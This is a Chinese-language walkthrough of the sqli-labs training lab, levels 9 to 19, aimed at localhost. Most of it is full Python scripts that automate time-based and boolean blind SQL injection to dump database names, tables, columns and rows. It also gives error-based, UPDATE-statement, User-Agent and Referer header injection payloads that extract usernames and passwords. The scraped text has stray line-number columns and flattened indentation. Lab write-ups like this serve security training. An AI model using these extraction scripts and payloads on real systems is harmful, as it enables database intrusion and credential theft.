90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
from requests import get
from time import *

def GuessDBLength():
print '[+]Guessing DBLength'
i = 0
while 1:
s = clock()
r = get("http://localhost/sqllab/Less-9/?id=1' and length(database())=%d and sleep(2)--+" %i)
html = r.text
if clock()-s > 1.5:
print ' [-]The DatabaseNameLength is', i
return i
i+=1

def GuessDBName(length):
print '[+]Guessing DBName'
name = ''
for i in xrange(length):
for n in xrange(127):
s = clock()
r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR(database(),%d,1))='%d' and sleep(2)--+" %(i+1,n))
html = r.text
if clock()-s > 1.5:
name += chr(n)
print ' [-]', name
break
print ' [-]DBName is:', name
return name

def GuessTBsNum(name):
print '[+]Guessing Tables num'
i = 0
while 1:
s = clock()
r = get("http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') and sleep(2)--+" %(i,name))
html = r.text
if clock()-s > 1.5:
print ' [-]The Tables num is', i
break
i+=1
return i

def GuessTBNameLenth(n, name):
print '[+]Guessing TableName Length'
i = 1
while 1:
s = clock()
r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) and sleep(2)--+" %(name,n,i))
html = r.text
if clock()-s < 1.5:
print ' [-]The TableName Lenth is', i-1
return i-1
i+=1

def GuessTBsNames(num, DBName):
TBsNames = []
for no in range(num):
name = ''
length = GuessTBNameLenth(no, DBName)
print ' [-]Guessing Table Name'
for i in xrange(length):
for n in xrange(127):
s = clock()
r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' and sleep(2)--+" %(DBName,no,i+1,n))
html = r.text
if clock()-s > 1.5:
name += chr(n)
print ' [-]', name
break
TBsNames.append(name)
print ' [-]All Tables Names is:', TBsNames
return TBsNames

def GuessCLMNum(tname,dname):
print '[+]Guessing Colunms num'
i = 0
while 1:
s = clock()
r = get("http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') and sleep(2)--+" %(i,tname,dname))
html = r.text
if clock()-s > 1.5:
print ' [-]The Colunm num is', i
return i
i+=1

def GuessCLMLen(cnum, tname, dname):
i = 1
while 1:
s = clock()
r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) and sleep(2)--+" %(tname,dname,cnum,i))
html = r.text
if clock()-s < 1.5:
print ' [-]The Colunm Lenth is', i-1
return i-1
i+=1

def GuessCLMName(DBName, TNames):
for tname in TNames:
print '[+]Guessing Colunms for', tname
CLMNames = []
for cnum in range(GuessCLMNum(tname,DBName)):
length = GuessCLMLen(cnum, tname, DBName)
name = ''
for i in xrange(length):
for n in xrange(127):
s = clock()
r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' and sleep(2)--+" %(tname,DBName,cnum,i+1,n))
html = r.text
if clock()-s > 1.5:
name += chr(n)
print ' [-]', name
break

data = GuessDatas(DBName, tname, name)
CLMNames.append(name)
print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
i = 0
while 1:
s = clock()
r = get("http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(%s) FROM %s.%s) and sleep(2)--+" %(i,cname,dname,tname))
html = r.text
if clock()-s > 1.5:
print ' [-]The Datas num is', i
return i
i+=1

def GuessDataLen(dname, tname, cname, n):
print ' [-]Guessing data length'
i = 1
while 1:
s = clock()
r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) and sleep(2)--+" %(cname, dname, tname, n, i))
html = r.text
if clock()-s < 1.5:
print ' [-]The Data Lenth is', i-1
return i-1
i+=1

def GuessDatas(dname, tname, cname):
datanum = GuessDatasnum(dname, tname, cname)
Data = []
for no in range(datanum):
length = GuessDataLen(dname, tname, cname, no)
print ' [-]Guessing data'
name = ''
for i in xrange(length):
for n in xrange(127):
while 1:
s = clock()
try:
r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' and sleep(2)--+" %(cname, dname, tname, no,i+1,n))
break
except:
print 'Relaxing...'
html = r.text
if clock()-s > 1.5:
name += chr(n)
print ' [-]', name
break
Data.append(name)
print ' [-]All Datas of %s is:' %cname, Data
return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day10-Less10

分析

1
2
3
同 9
只是单引号改双引号

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
from requests import get
from time import *

def GuessDBLength():
print '[+]Guessing DBLength'
i = 0
while 1:
s = clock()
r = get("http://localhost/sqllab/Less-10/?id=1\" and length(database())=%d and sleep(2)--+" %i)
html = r.text
if clock()-s > 1.5:
print ' [-]The DatabaseNameLength is', i
return i
i+=1

def GuessDBName(length):
print '[+]Guessing DBName'
name = ''
for i in xrange(length):
for n in xrange(127):
s = clock()
r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR(database(),%d,1))='%d' and sleep(2)--+" %(i+1,n))
html = r.text
if clock()-s > 1.5:
name += chr(n)
print ' [-]', name
break
print ' [-]DBName is:', name
return name

def GuessTBsNum(name):
print '[+]Guessing Tables num'
i = 0
while 1:
s = clock()
r = get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') and sleep(2)--+" %(i,name))
html = r.text
if clock()-s > 1.5:
print ' [-]The Tables num is', i
break
i+=1
return i

def GuessTBNameLenth(n, name):
print '[+]Guessing TableName Length'
i = 1
while 1:
s = clock()
r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) and sleep(2)--+" %(name,n,i))
html = r.text
if clock()-s < 1.5:
print ' [-]The TableName Lenth is', i-1
return i-1
i+=1

def GuessTBsNames(num, DBName):
TBsNames = []
for no in range(num):
name = ''
length = GuessTBNameLenth(no, DBName)
print ' [-]Guessing Table Name'
for i in xrange(length):
for n in xrange(127):
s = clock()
r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' and sleep(2)--+" %(DBName,no,i+1,n))
html = r.text
if clock()-s > 1.5:
name += chr(n)
print ' [-]', name
break
TBsNames.append(name)
print ' [-]All Tables Names is:', TBsNames
return TBsNames

def GuessCLMNum(tname,dname):
print '[+]Guessing Colunms num'
i = 0
while 1:
s = clock()
r = get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') and sleep(2)--+" %(i,tname,dname))
html = r.text
if clock()-s > 1.5:
print ' [-]The Colunm num is', i
return i
i+=1

def GuessCLMLen(cnum, tname, dname):
i = 1
while 1:
s = clock()
r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) and sleep(2)--+" %(tname,dname,cnum,i))
html = r.text
if clock()-s < 1.5:
print ' [-]The Colunm Lenth is', i-1
return i-1
i+=1

def GuessCLMName(DBName, TNames):
for tname in TNames:
print '[+]Guessing Colunms for', tname
CLMNames = []
for cnum in range(GuessCLMNum(tname,DBName)):
length = GuessCLMLen(cnum, tname, DBName)
name = ''
for i in xrange(length):
for n in xrange(127):
s = clock()
r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' and sleep(2)--+" %(tname,DBName,cnum,i+1,n))
html = r.text
if clock()-s > 1.5:
name += chr(n)
print ' [-]', name
break

data = GuessDatas(DBName, tname, name)
CLMNames.append(name)
print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
i = 0
while 1:
s = clock()
r = get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(%s) FROM %s.%s) and sleep(2)--+" %(i,cname,dname,tname))
html = r.text
if clock()-s > 1.5:
print ' [-]The Datas num is', i
return i
i+=1

def GuessDataLen(dname, tname, cname, n):
print ' [-]Guessing data length'
i = 1
while 1:
s = clock()
r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) and sleep(2)--+" %(cname, dname, tname, n, i))
html = r.text
if clock()-s < 1.5:
print ' [-]The Data Lenth is', i-1
return i-1
i+=1

def GuessDatas(dname, tname, cname):
datanum = GuessDatasnum(dname, tname, cname)
Data = []
for no in range(datanum):
length = GuessDataLen(dname, tname, cname, no)
print ' [-]Guessing data'
name = ''
for i in xrange(length):
for n in xrange(127):
while 1:
s = clock()
try:
r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' and sleep(2)--+" %(cname, dname, tname, no,i+1,n))
break
except:
print 'Relaxing...'
html = r.text
if clock()-s > 1.5:
name += chr(n)
print ' [-]', name
break
Data.append(name)
print ' [-]All Datas of %s is:' %cname, Data
return Data

s = clock()
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'
print '[!]Timer', round(clock()-s,2),'s'```

## Day11-Less11
### 分析

select XX,XX,XX from XX where username = '\(uname' and password = '\)passwd'
1' group by 3#
报错

select XX,XX from XX where username = '\(uname' and password = '\)passwd'

Username:' or 1 limit 1,2#
Password:(任意)

1
2
3

## Day12-Less12
### 分析

select XX,XX,XX from XX where username = ("\(uname") and password = ("\)passwd")
1") group by 3#
报错

select XX,XX from XX where username = ("\(uname") and password = ("\)passwd")

Username:") or 1 limit 1,2#
Password:(任意)

1
2
3

## Day13-Less13
### 分析

select XX,XX from XX where username = ('\(uname') and password = ('\)passwd')

') union select 1,2 from INFORMATION_SCHEMA.tables where updatexml(1,concat('',(select username from security.users limit 0,1),'',(select password from security.users limit 0,1)),1) #

1
2
3

## Day14-Less14
### 分析

select XX,XX from XX where username = "\(uname" and password = "\)passwd"

" union select 1,2 from INFORMATION_SCHEMA.tables where updatexml(1,concat('',(select username from security.users limit 0,1),'',(select password from security.users limit 0,1)),1) #

1
2
3

## Day15-Less15
### 分析

select XX,XX from XX where username = '\(uname' and password = '\)passwd'
1' or 1 #

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178

### 代码
```python
from requests import post

def GuessDBLength():
print '[+]Guessing DBLength'
i = 0
while 1:
payload = {'uname': "0' or length(database())=%d#" %i, 'passwd': ''}
r = post("http://localhost/sqllab/Less-15/",data=payload)
html = r.text
if 'flag.jpg' in html:
print ' [-]The DatabaseNameLength is', i
return i
i+=1

def GuessDBName(length):
print '[+]Guessing DBName'
name = ''
for i in xrange(length):
for n in xrange(127):
payload = {'uname': "0' or ascii(SUBSTR(database(),%d,1))='%d'#" %(i+1,n), 'passwd': ''}
r = post("http://localhost/sqllab/Less-15/",data=payload)
html = r.text
if 'flag.jpg' in html:
name += chr(n)
print ' [-]', name
break
print ' [-]DBName is:', name
return name

def GuessTBsNum(name):
print '[+]Guessing Tables num'
i = 0
while 1:
payload = {'uname': "' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') #" %(i,name), 'passwd': ''}
r = post("http://localhost/sqllab/Less-15/",data=payload)
html = r.text
if 'flag.jpg' in html:
print ' [-]The Tables num is', i
break
i+=1
return i

def GuessTBNameLenth(n, name):
print '[+]Guessing TableName Length'
i = 1
while 1:
payload = {'uname': "' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) #" %(name,n,i), 'passwd': ''}
r = post("http://localhost/sqllab/Less-15/",data=payload)
html = r.text
if 'flag.jpg' not in html:
print ' [-]The TableName Lenth is', i-1
return i-1
i+=1

def GuessTBsNames(num, DBName):
TBsNames = []
for no in range(num):
name = ''
length = GuessTBNameLenth(no, DBName)
print ' [-]Guessing Table Name'
for i in xrange(length):
for n in xrange(127):
payload = {'uname': "' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' #" %(DBName,no,i+1,n), 'passwd': ''}
r = post("http://localhost/sqllab/Less-15/",data=payload)
html = r.text
if 'flag.jpg' in html:
name += chr(n)
print ' [-]', name
break
TBsNames.append(name)
print ' [-]All Tables Names is:', TBsNames
return TBsNames

def GuessCLMNum(tname,dname):
print '[+]Guessing Colunms num'
i = 0
while 1:
payload = {'uname': "' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') #" %(i,tname,dname), 'passwd': ''}
r = post("http://localhost/sqllab/Less-15/",data=payload)
html = r.text
if 'flag.jpg' in html:
print ' [-]The Colunm num is', i
return i
i+=1

def GuessCLMLen(cnum, tname, dname):
i = 1
while 1:
payload = {'uname': "' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) #" %(tname,dname,cnum,i), 'passwd': ''}
r = post("http://localhost/sqllab/Less-15/",data=payload)
html = r.text
if 'flag.jpg' not in html:
print ' [-]The Colunm Lenth is', i-1
return i-1
i+=1

def GuessCLMName(DBName, TNames):
for tname in TNames:
print '[+]Guessing Colunms for', tname
CLMNames = []
for cnum in range(GuessCLMNum(tname,DBName)):
length = GuessCLMLen(cnum, tname, DBName)
name = ''
for i in xrange(length):
for n in xrange(127):
payload = {'uname': "' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' #" %(tname,DBName,cnum,i+1,n), 'passwd': ''}
r = post("http://localhost/sqllab/Less-15/",data=payload)
html = r.text
if 'flag.jpg' in html:
name += chr(n)
print ' [-]', name
break

data = GuessDatas(DBName, tname, name)
CLMNames.append(name)
print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
i = 0
while 1:
payload = {'uname': "' or %d=(SELECT count(%s) FROM %s.%s) #" %(i,cname,dname,tname), 'passwd': ''}
r = post("http://localhost/sqllab/Less-15/?id=",data=payload)
html = r.text
if 'flag.jpg' in html:
print ' [-]The Datas num is', i
return i
i+=1

def GuessDataLen(dname, tname, cname, n):
print ' [-]Guessing data length'
i = 1
while 1:
payload = {'uname': "' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) #" %(cname, dname, tname, n, i), 'passwd': ''}
r = post("http://localhost/sqllab/Less-15/",data=payload)
html = r.text
if 'flag.jpg' not in html:
print ' [-]The Data Lenth is', i-1
return i-1
i+=1

def GuessDatas(dname, tname, cname):
datanum = GuessDatasnum(dname, tname, cname)
Data = []
for no in range(datanum):
length = GuessDataLen(dname, tname, cname, no)
print ' [-]Guessing data'
name = ''
for i in xrange(length):
for n in xrange(127):
while 1:
try:
payload = {'uname': "' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' #" %(cname, dname, tname, no,i+1,n), 'passwd': ''}
r = post("http://localhost/sqllab/Less-15/",data=payload)
break
except:
print 'Relaxing...'
html = r.text
if 'flag.jpg' in html:
name += chr(n)
print ' [-]', name
break
Data.append(name)
print ' [-]All Datas of %s is:' %cname, Data
return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day16-Less16

分析

1
2
3
4
5
6
select XX,XX from XX where username = ("$uname") and password = ("$passwd")

1") or 1#

1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where length(database())=8#
1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR(database(),1,1))=115#

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
from requests import post
from time import *

def GuessDBLength():
print '[+]Guessing DBLength'
i = 0
while 1:
s = clock()
payload = {'uname': '1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where length(database())=%d#' %i, 'passwd': ''}
r = post("http://localhost/sqllab/Less-16/",data=payload)

if clock()-s > 1.5:
print ' [-]The DatabaseNameLength is', i
return i
i+=1

def GuessDBName(length):
print '[+]Guessing DBName'
name = ''
for i in xrange(length):
for n in xrange(127):
s = clock()
payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR(database(),%d,1))='%d'#" %(i+1,n), 'passwd': ''}
r = post("http://localhost/sqllab/Less-16/",data=payload)

if clock()-s > 1.5:
name += chr(n)
print ' [-]', name
break
print ' [-]DBName is:', name
return name

def GuessTBsNum(name):
print '[+]Guessing Tables num'
i = 0
while 1:
s = clock()
payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') #" %(i,name), 'passwd': ''}
r = post("http://localhost/sqllab/Less-16/",data=payload)

if clock()-s > 1.5:
print ' [-]The Tables num is', i
break
i+=1
return i

def GuessTBNameLenth(n, name):
print '[+]Guessing TableName Length'
i = 1
while 1:
s = clock()
payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) #" %(name,n,i), 'passwd': ''}
r = post("http://localhost/sqllab/Less-16/",data=payload)

if clock()-s < 1.5:
print ' [-]The TableName Lenth is', i-1
return i-1
i+=1

def GuessTBsNames(num, DBName):
TBsNames = []
for no in range(num):
name = ''
length = GuessTBNameLenth(no, DBName)
print ' [-]Guessing Table Name'
for i in xrange(length):
for n in xrange(127):
s = clock()
payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' #" %(DBName,no,i+1,n), 'passwd': ''}
r = post("http://localhost/sqllab/Less-16/",data=payload)

if clock()-s > 1.5:
name += chr(n)
print ' [-]', name
break
TBsNames.append(name)
print ' [-]All Tables Names is:', TBsNames
return TBsNames

def GuessCLMNum(tname,dname):
print '[+]Guessing Colunms num'
i = 0
while 1:
s = clock()
payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') #" %(i,tname,dname), 'passwd': ''}
r = post("http://localhost/sqllab/Less-16/",data=payload)

if clock()-s > 1.5:
print ' [-]The Colunm num is', i
return i
i+=1

def GuessCLMLen(cnum, tname, dname):
i = 1
while 1:
s = clock()
payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) #" %(tname,dname,cnum,i), 'passwd': ''}
r = post("http://localhost/sqllab/Less-16/",data=payload)

if clock()-s < 1.5:
print ' [-]The Colunm Lenth is', i-1
return i-1
i+=1

def GuessCLMName(DBName, TNames):
for tname in TNames:
print '[+]Guessing Colunms for', tname
CLMNames = []
for cnum in range(GuessCLMNum(tname,DBName)):
length = GuessCLMLen(cnum, tname, DBName)
name = ''
for i in xrange(length):
for n in xrange(127):
s = clock()
payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' #" %(tname,DBName,cnum,i+1,n), 'passwd': ''}
r = post("http://localhost/sqllab/Less-16/",data=payload)

if clock()-s > 1.5:
name += chr(n)
print ' [-]', name
break

data = GuessDatas(DBName, tname, name)
CLMNames.append(name)
print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
i = 0
while 1:
s = clock()
payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(%s) FROM %s.%s) #" %(i,cname,dname,tname), 'passwd': ''}
r = post("http://localhost/sqllab/Less-16/?id=",data=payload)

if clock()-s > 1.5:
print ' [-]The Datas num is', i
return i
i+=1

def GuessDataLen(dname, tname, cname, n):
print ' [-]Guessing data length'
i = 1
while 1:
s = clock()
payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) #" %(cname, dname, tname, n, i), 'passwd': ''}
r = post("http://localhost/sqllab/Less-16/",data=payload)

if clock()-s < 1.5:
print ' [-]The Data Lenth is', i-1
return i-1
i+=1

def GuessDatas(dname, tname, cname):
datanum = GuessDatasnum(dname, tname, cname)
Data = []
for no in range(datanum):
length = GuessDataLen(dname, tname, cname, no)
print ' [-]Guessing data'
name = ''
for i in xrange(length):
for n in xrange(127):
while 1:
s = clock()
try:
payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' #" %(cname, dname, tname, no,i+1,n), 'passwd': ''}
r = post("http://localhost/sqllab/Less-16/",data=payload)
break
except:
print 'Relaxing...'

if clock()-s > 1.5:
name += chr(n)
print ' [-]', name
break
Data.append(name)
print ' [-]All Datas of %s is:' %cname, Data
return Data

s = clock()
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'
print '[!]Timer', round(clock()-s,2),'s'```

## Day17-Less17
### 分析

UPDATE table SET password = '' WHERE username = 'Dhakkan'

基于报错注入:
UPDATE users SET password = ''+(select updatexml(1,concat('',(select from (select username from security.users limit 0,1)x),'',(select from (select password from security.users limit 0,1)x)),1))+'' WHERE username = 'Dhakkan';

(通过子查询,使 select 的表更换一个名称,解决在同一语句中不能先 select 出同一表中的某些值,再 update 这个表的限制)
UPDATE users SET password = ''+(select 1 from (select 1) as a where updatexml(1,concat('*',(select username from security.users as x limit 0,1)),1))+'' WHERE username = 'Dhakkan';
会报错:
即"ERROR 1093 (HY000): You can't specify target table 'users' for update in FROM clause"

盲注也行:
基于时间
select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c);
select(select if(length(database())=8,sleep(1),'1') From ((select 1 as a) union (select 2 as b)) as c);

或者基于正则

select(select 'a' REGEXP (case when length(database())=8 then '.' else '' end) From ((select 1 as a) union (select 2 as b)) as c);


UPDATE users SET password = ''+(select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c))+'' WHERE username = 'Dhakkan';
或者
UPDATE users SET password = ''+(select(select 'a' REGEXP (case when length(database())=8 then '.' else '' end) From ((select 1 as a) union (select 2 as b)) as c))+'' WHERE username = 'Dhakkan';

UPDATE users SET password = ''+(select(select case when length(database())=8 then sleep(1) else '1' end From (select 1,2)))+'' WHERE username = 'Dhakkan';

from requests import *
pdata = {
'uname': "Dhakkan",
'passwd':"'+(select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c))+'"
}
print post('http://localhost/sqllab/Less-17/', data = pdata).text

1
2
3

## Day18-Less18
### 分析

想做出这题,先得知道一组用户名与密码...
假设我们知道 Dhakkan 的密码为 dumbo。emmmmm 然后继续做

('','','')

x'
::1', 'Dhakkan')
('x'',' ::1','')

x' or 1
', '::1', 'Dhakkan')
('x' or 1 ','','')

('
')#
','','')
Column count doesn't match value count at row 1
(由于一个 SQL 执行语句,前面的字段与后面值的数目不一致)
INSERT INTO("useragent","ip","username") VALUES('','::1','Dhakkan');
->
INSERT INTO("useragent","ip","username") VALUES('')#','::1','Dhakkan');

('') or 1#','','')
or 1#', '::1', 'Dhakkan')
INSERT INTO("useragent","ip","username") VALUES('') or 1#','::1','Dhakkan');

INSERT INTO("useragent","ip","username") VALUES('
1' and (select sleep(1) from (select 1,2)x where length(database())=7) or '
','::1','Dhakkan');

us 注入:
时间
1' and (select sleep(1) from (select 1,2)x where length(database())=7) or '

报错
1' and (select (updatexml(1,concat('',(select username from security.users limit 0,1),'',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '

1
2
3
4
5
6
7
8
9
10
11
12
13
14

### 代码
```python
from requests import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}
headers = {
'User-Agent': "1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '",
}

print post('http://localhost/sqllab/Less-18/', headers = headers,data=pdata).text

Day19-Less19

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
想做出这题,先得知道一组用户名与密码...
假设我们知道 Dhakkan 的密码为 dumbo。emmmmm 然后继续做

('','')

x'
::1')
('x'',' ::1')

x' or 1
', '::1')
('x' or 1 ','::1')

('
')#
','','')
Column count doesn't match value count at row 1
(由于一个 SQL 执行语句,前面的字段与后面值的数目不一致)
INSERT INTO("referer","ip") VALUES('','::1');
->
INSERT INTO("referer","ip") VALUES('')#','::1');

('') or 1#','','')
or 1#', '::1')
INSERT INTO("referer","ip") VALUES('') or 1#','::1');


INSERT INTO("referer","ip") VALUES('
1' and (select sleep(1) from (select 1,2)x where length(database())=7) or '
','::1');


us 注入:
时间
1' and (select sleep(1) from (select 1,2)x where length(database())=7) or '

报错
